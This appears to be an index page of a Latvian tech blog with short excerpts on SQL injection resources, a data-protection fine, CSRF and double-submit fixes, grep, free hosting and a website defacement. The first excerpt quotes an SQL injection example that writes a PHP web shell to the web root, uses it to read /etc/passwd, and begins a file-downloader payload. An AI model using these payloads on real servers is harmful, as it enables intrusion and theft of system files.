SQL injection Knowledge Base

Pilnīgākais resurss, kuru esmu redzējis saistība ar SQL injekcijām. http://websec.ca/kb/sql_injection Tiem, kam interesē cik vienkārši var izmantojot kļūdaini uzrakstītas komandas un sql augšpielādes shell skatās piemēru šeit: http://websec.ca/kb/sql_injection#MySQL_Writing_Files Examples: To write a PHP shell: SELECT ‘<? system($_GET[\’c\’]); ?>’ INTO OUTFILE ‘/var/www/shell.php’;   and then access it at: http://localhost/shell.php?c=cat%20/etc/passwd To write a downloader: SELECT ‘<? fwrite(fopen($_GET[f], \’w\’), file_get_contents($_GET[u])); ...

“BTA” cenšas izvairīties no soda par nolaidīgu personas datu glabāšanu

Defense blogā ieraudzīju rakstu par BTA (https://defense.lv/2012/07/04/bta-censas-izvairities-no-soda-par-nolaidigu-personas-datu-glabasanu/) un atmiņām pievienoju arī tiesas izrakstu. Šis gadījums šķiet interesants trīs iemeslu dēļ: ir reāls piemērs notiesājošam spriedumam un ir zināms arī soda summa ja paskaidrojumā ir minēta taisnība, tad kāpēc netika saglabāti pierādījumi par urķēsanu? jo vairāk parādīsies notiesājoši spriedumi un tie tiks darīti zināmi sabiedrībai, jo ...

Double Submit problēmas risinājums

Diezgan pavecs, bet labs raksts, kur aprakstīts, ka to var atrisināt izmantojot GET pieprasījumu ar redirektu pēc POST vai arī izmantojot unikālas vērtības. Kombinējot abus variantus var veiksmīgi izvairīties arī no CSRF. Redirekta piemērs priekš PHP. Tweet

SQL injection prezentācija

Diezgan laba un svaiga prezentācija par SQL injekcēšanu, kļūdām un mītiem. Sql Injection Myths and Fallacies View more presentations from Karwin Software Solutions LLC Tweet

Instagram veidotāji stāsta par savu sākumu.

Instagram veidotāji uzstājas Stenfordas universitātē un stāstā savu stāstu par sākumu, mītiem, start-up, utml. Ieraksts ir veidots 2011. gada maijā un tad viņi vēl nezināja, ka izdosies to pārdot facbook par tādu pašu cenu, kā Audi nopērk Ducati. Interesanti bija, ka autors atteicies no daudz labāk atmaksāta darba, lai varētu darīt to, kas patīk. Kārtējo ...

Bezmaksas web kurss, par WEB

Daudzsološs Virdžīnijas universitātes bezmaksas kurs par web un kā tas darbojas. Pirmā nodaļa izskatās pēc satura daudzsološa. http://www.udacity.com/overview/Course/cs253/CourseRev/apr2012 Tweet

Vēl viens ieberziens ar Free web hosting vai pakalpojums maksā tik cik maksā 2

Cilvēkiem vienmēr ir raksturīgi meklēt lētākas alternatīvas un to vairākas reizes esmu darījis arī saistībā ar Web Hosting pakalpojumiem. Laika gaitā esmu izmēģinājis vairākus bezmaksas pakalpojumus, bet vienmēr kaut kas tajos nav apmierinājis- nav pareizā php,mysql vai tml atbalsta, vietas ierobežojums vai pārsūtāmo datu ierobežojums. Grūtāk pamanāmās lietas ir konekciju ierobežojums, kurš atklājas tikai mēģinot ...

Grep un CUT

Dažreiz rodas nepārvarama vēlme  kaut ko sameklēt log failos un šādos gadījumos bez grep un cut neiztikt. Šādi izskatījās DHCP logā atrast rindiņas, kuras satur vārdu Host, no tām neparādīt, kurās ir D8 vai 371. Attēlot tikai 2. kolonu (kolonas atdalās ar ‘=’ zīmi). Sakārtot alfabēta secībā. Datorvalodā tas izskatās šādi: grep “Host” 19.04 | ...

Kā izveidot panorāmas foto?

Divi video, kuri vienkārši parāda kā to izdarīt: Un otrs Tweet

Telia mājaslapa uzurķēta

Vakar daudzi runāja par Telia.lv lapas uzlaušanu, kas izpaudās kā gandrīz neredzamu linku uz citiem resursiem ievietošanu šajā lapā: http://telia.lv/lv/par-mums/jaunumi. Ekrānšāviņš no twitter: http://twitter.com/#!/laacz/status/187426840640626688/photo/1 Šādus uzbrukumus ir diezgan grūti atklāt (tāds ir viņu mērķis) un tie galvenokārt kalpo, lai palielinātu citu lapu reitingu. Kādu laiku atpakaļ bija iespēja apskatīt arī citu lapu, kurai līdzīgi tikai ...